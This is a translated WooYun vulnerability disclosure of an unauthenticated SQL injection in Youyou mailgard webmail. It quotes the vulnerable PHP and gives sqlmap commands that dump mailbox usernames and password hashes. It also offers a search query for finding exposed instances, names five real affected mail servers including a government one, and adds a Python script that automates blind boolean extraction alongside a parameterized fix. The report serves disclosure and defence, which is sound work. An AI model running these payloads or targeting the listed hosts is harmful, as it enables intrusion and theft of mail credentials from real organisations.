Vulnerability Summary

Defect ID: wooyun-2015-098828

Title: Youyou (佑友) mailgard webmail, an SQL injection requiring no login

Vendor: 深圳市河辰通讯技术有限公司 (Shenzhen Hechen Communication Technology Co., Ltd.)

Author: f4ckbaidu

Submitted: 2015-03-31 09:13

Fix deadline: 2015-07-02 16:18

Published: 2015-07-02 16:18

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2015-03-31: details sent to the vendor, awaiting vendor handling
2015-04-03: vendor confirmed; details disclosed to the vendor only
2015-04-06: details opened to third-party security partners
2015-05-28: details opened to core white hats and domain experts
2015-06-07: details opened to regular white hats
2015-06-17: details opened to intern white hats
2015-07-02: details made public

Brief description:

Programmers, don't blame me.

Detailed description:

As mentioned in WooYun: 佑友mailgard webmail命令执行之二 (Youyou mailgard webmail command execution, part 2), the system ships with a global GPC filter that applies addslashes automatically.
As mentioned in WooYun: 佑友mailgard webmail任意文件上传导致getshell(无需登录) (Youyou mailgard webmail arbitrary file upload leading to getshell, no login required), several files can be accessed without authorization:

./overflow_alarm.php
./sms_send.php
./src/old.rule.php
./src/public_folders_upload.php
./src/big_attach.php
./src/big_att_upload.php
./src/read_data.php
./src/upload.php
./sync/linkman.php


./sync/linkman.php contains an obvious SQL injection ($group_id); the code is below. One caveat a reader should note from that code: the request's $group_id is read into a global but never passed to outputUsers(), whose own $group_id parameter defaults to 0, so the request value that actually reaches the query strings in this file is the global $name set by conn.php.
Because the file does not include global.php, the global filter does not apply and no login is needed to reach it; if magic_quotes_gpc is off (the system ships with it off by default), it is injectable.

<?php
require_once 'conn.php';
function outputUsers($export_range='', $group_id=0, $part=0){
    global $name,$msg;
    if($export_range == 'public'){
        $query = " AND `group_remark`='public|'";
        $query2 = " AND `adscription`='public'";
    }else{
        // $name comes straight from the request (set in conn.php) and is concatenated unescaped
        $query = " AND `group_remark`='private|".$name."'";
        $query2 = " AND `adscription`='".$name."'";
    }
    // $group_id is concatenated into the query without escaping
    $sql = "SELECT * FROM `groups` WHERE `fid`='".$group_id."' ".$query;
    $res = mysql_query($sql);
    while($rs = mysql_fetch_array($res)){

        echo "<group_$part><groupId>".$rs['group_id']."</groupId><groupName>".$rs['group_name']."</groupName>";
        $sqlg = "SELECT * FROM `groups` WHERE `fid`='".$rs['group_id']."' ".$query;
        $resg = mysql_query($sqlg);
        if($rsg = mysql_fetch_array($resg)){
            outputUsers($export_range,$rs['group_id'],$part+1);
        }
        // list the contacts under this group
        $sqll = "SELECT * FROM `linkman` WHERE `group_id`='".$rs['group_id']."' $query2 ORDER BY convert(`name` using GBK) ";
        $resl = mysql_query($sqll);
        while ($rsl=mysql_fetch_array ($resl)) {
            echo "<linkman>
<email>".$rsl['mail_addr']."</email>
<name>".$rsl['name']."</name>
</linkman>";
        }
        echo "</group_$part>";
    }
}
// read from the request, but note that outputUsers() below is never called with this value
$group_id = $_POST['group_id'] ? $_POST['group_id'] : $_GET['group_id'];
$export_range = $_POST['export_range'] ? $_POST['export_range'] : $_GET['export_range'];
echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
echo '<hechen>';
echo '<public>';
outputUsers('public');
echo '</public>';
echo '<private>';
outputUsers();
echo '</private>';
echo '</hechen>';
?>


Now look at conn.php, which it includes; the injection there is just as obvious: $name is concatenated into every query (the other unfiltered input, $token, only reaches crypt() in this file and never a query string).
Again, global.php is not included, so the global filter does not apply and no login is needed; with magic_quotes_gpc off (the default), it is injectable.

<?php
header('Content-type: text/xml');
error_reporting(0);
ini_set("display_errors", "0");
$dbserver = 'localhost';
$dbuser = 'syssql';
$dbuserpw = 'h*****8';
$msg = '';
$link = mysql_connect($dbserver,$dbuser,$dbuserpw) or setError('Cannot connect to the DB');
mysql_select_db('hicommail',$link) or setError('Cannot select the DB');
mysql_query("set names utf8");
// both taken straight from the request; without global.php nothing applies addslashes
$name = $_POST['name'] ? $_POST['name'] : $_GET['name'];
$token = $_POST['token'] ? $_POST['token'] : $_GET['token'];
if(!$name || !$token){
    setError("Token can't be empty");
}else{
    // $name concatenated unescaped: the injection point used by the sqlmap run below
    $sql = "SELECT * FROM `mailbox` WHERE `username` = '".$name."'";
    $result = mysql_query($sql,$link);
    $row = mysql_fetch_assoc($result);
    if(!$row['password']){
        setError('Token does not exist');
    }elseif($row['active']=="0"){
        setError('This account has been frozen');
    }else{
        $sql = "SELECT * FROM `define_para` WHERE `user_name`='$name' ";
        $result = mysql_query($sql);
        if($rs = mysql_fetch_array($result)) {
            if(time()-$rs['trydate']<120 && $rs['trytimes']>=3) {
                mysql_query("UPDATE `define_para` SET `trydate`=".time()." WHERE `user_name`='$name' ");
                setError('Try too frequently, please try again after two minutes');
            }else{
                if($row['password'] != crypt($token,$row["password"])){
                    $sql = "SELECT * FROM `define_para` WHERE `user_name`='$name' ";
                    $result = mysql_query($sql);
                    if($rs = mysql_fetch_array($result)) {
                        if(time()-$rs['trydate']<120) {
                            $rs['trytimes']++;
                            mysql_query("UPDATE `define_para` SET `trytimes`=`trytimes`+1 WHERE `user_name`='$name' ");
                        }else{
                            $rs['trytimes'] = 1;
                            mysql_query("UPDATE `define_para` SET `trydate`='".time()."',`trytimes`=1 WHERE `user_name`='$name' ");
                        }
                    }
                    if( (3-$rs['trytimes'])>0 ){
                        setError(sprintf('Login fails, you can try %d times', (3-$rs['trytimes'])));
                    }else{
                        setError('Try too frequently, please try again after two minutes');
                    }
                }
            }
        }
    }
}
function setError($msg){
    echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
    echo "<error>$msg</error>";
    exit;
}
?>


The flow is that conn.php runs first to verify identity (every failure path calls setError(), which exits), and only then does the linkman.php code run.
So to inject, we have to go through conn.php. The error messages give a boolean oracle: a true condition returns a row and ends in "Login fails, you can try N times" (or the two-minute lockout message), while a false condition ends in "Token does not exist".
Run sqlmap:

sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token=1" --dbms=mysql --technique=B --dbs --threads=5


Mailbox accounts and passwords are in hicommail.mailbox, and sqlmap can dump them directly:

sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token=1" --dbms=mysql --technique=B --threads=5 -D hicommail -T mailbox -C username,password --dump


[screenshot: 1.png]


Passwords are stored as PHP crypt($password, $md5salt), i.e. MD5-crypt, for example $1$08ab2d3c$G1Q/PyedrHxQdfGXOmga0/; cracking hashes of this type takes time.
However, another table (hicommail.popmanage) stores a small number of POP3 passwords in plaintext, merely base64-encoded; they are not posted here to protect the users.
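The following Python script is an added example, not code from mailgard or from the report's author. It emulates the conn.php authentication query against an in-memory SQLite table (the rows are constructed, not real credentials; the one hash is the format example quoted above) and shows why sqlmap's --technique=B works here: when the injected condition is true a row comes back and the response is the crypt-mismatch message, when it is false the response is "Token does not exist", and nothing else is needed to read the database one bit at a time. The payload shape admin' AND (...) AND '1'='1 is my own choice rather than the report's admin' or '1'='1 * prefix, and unicode()/substr() are SQLite functions; against MySQL the equivalents are ascii()/substring(). The crypt() comparison and the define_para try counter are omitted, which does not change the oracle, since every message on the row-found path differs from "Token does not exist". The last login function is the parameterized form the fix should take.

```python
import sqlite3

# Constructed sample rows standing in for hicommail.mailbox; not real credentials.
SAMPLE_MAILBOX = [
    ("admin", "$1$08ab2d3c$G1Q/PyedrHxQdfGXOmga0/", 1),  # hash format quoted in the report
    ("alice", "$1$c0ffee00$placeholderhashvalue00000", 1),
    ("frozen", "$1$deadbeef$placeholderhashvalue00000", 0),
]

TOKEN_DOES_NOT_EXIST = "Token does not exist"


def make_db():
    """In-memory SQLite stand-in for the hicommail database (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mailbox (username TEXT, password TEXT, active INTEGER)")
    db.executemany("INSERT INTO mailbox VALUES (?, ?, ?)", SAMPLE_MAILBOX)
    return db


def _respond(row):
    """The branch structure of conn.php after the mailbox lookup. The crypt()
    comparison and the try counter are left out: with an unknown token the
    comparison always fails, so a returned row always ends in 'Login fails'."""
    if row is None or not row[1]:
        return TOKEN_DOES_NOT_EXIST
    if row[2] == 0:
        return "This account has been frozen"
    return "Login fails, you can try 2 times"


def conn_php_vulnerable(db, name, token):
    """conn.php as shipped: $name is concatenated into the query unescaped
    (global.php not included, magic_quotes_gpc off). error_reporting(0) means
    a malformed query just looks like 'no row'."""
    if not name or not token:
        return "Token can't be empty"
    sql = "SELECT * FROM mailbox WHERE username = '" + name + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        row = None
    return _respond(row)


def conn_php_fixed(db, name, token):
    """Same logic with a bound parameter: the name travels as data, so quotes
    inside it can never change the statement."""
    if not name or not token:
        return "Token can't be empty"
    row = db.execute("SELECT * FROM mailbox WHERE username = ?", (name,)).fetchone()
    return _respond(row)


def make_oracle(db, login):
    """Boolean oracle: inject a condition behind a username known to exist and
    read the answer off the error message. Payload shape is mine (assumption);
    the report's sqlmap prefix was "admin' or '1'='1 *"."""
    def oracle(condition):
        name = "admin' AND (" + condition + ") AND '1'='1"
        return login(db, name, "x") != TOKEN_DOES_NOT_EXIST
    return oracle


def extract_string(oracle, subquery, max_len=64):
    """Recover a scalar subquery's result one character at a time by binary
    search over its code point (7 queries per character). Stops at the first
    NULL character, i.e. past the end of the string."""
    out = []
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{i},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def dump_column(db, login, table, column):
    """Equivalent of the report's -D hicommail -T mailbox -C ... --dump: pull a
    whole column through the single-value oracle with group_concat."""
    return extract_string(make_oracle(db, login),
                          f"SELECT group_concat({column}) FROM {table}")


if __name__ == "__main__":
    db = make_db()
    admin_hash = "SELECT password FROM mailbox WHERE username = 'admin'"
    print("vulnerable users:", dump_column(db, conn_php_vulnerable, "mailbox", "username"))
    print("vulnerable hash: ", extract_string(make_oracle(db, conn_php_vulnerable), admin_hash))
    print("fixed users:     ", repr(dump_column(db, conn_php_fixed, "mailbox", "username")))
```

Against the parameterized version the injected name is looked up literally, no row ever matches, and the oracle returns false for every condition, so the extraction loop ends immediately with an empty string. The same change (mysqli or PDO prepared statements in PHP) applies to every $name and $group_id concatenation in conn.php and linkman.php; re-adding the addslashes filter would only restore the escaping the author already showed can be bypassed elsewhere.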

Proof of vulnerability:

Baidu search intitle:"mailgard webmail"; I tested a few and basically all of them are affected.
Case 1: http://mail.iconergy.com:889/

[screenshot: 1.png]


Case 2: http://mail.csgholding.com:889/ (南玻, CSG Holding)

[screenshot: 2.png]


Case 3: http://www.gtc.com.cn:889/

[screenshot: 3.png]


A government one, case 4: http://email.szns.gov.cn:889/

[screenshot: 4.png]


Case 5: http://mail.gcredit.cn:889/

[screenshot: 5.png]

Fix recommendation:

Copyright notice: when reposting, please credit f4ckbaidu@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-04-03 16:17

Vendor reply:

CNVD has confirmed and reproduced the described issue, and has notified the software vendor through the contact details published on its website.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-07-02 21:40 | BeenQuiver (regular white hat | Rank: 101, vulns: 26 | Focused and efficient; keep good habits and never give up)

    The reporter is very patient.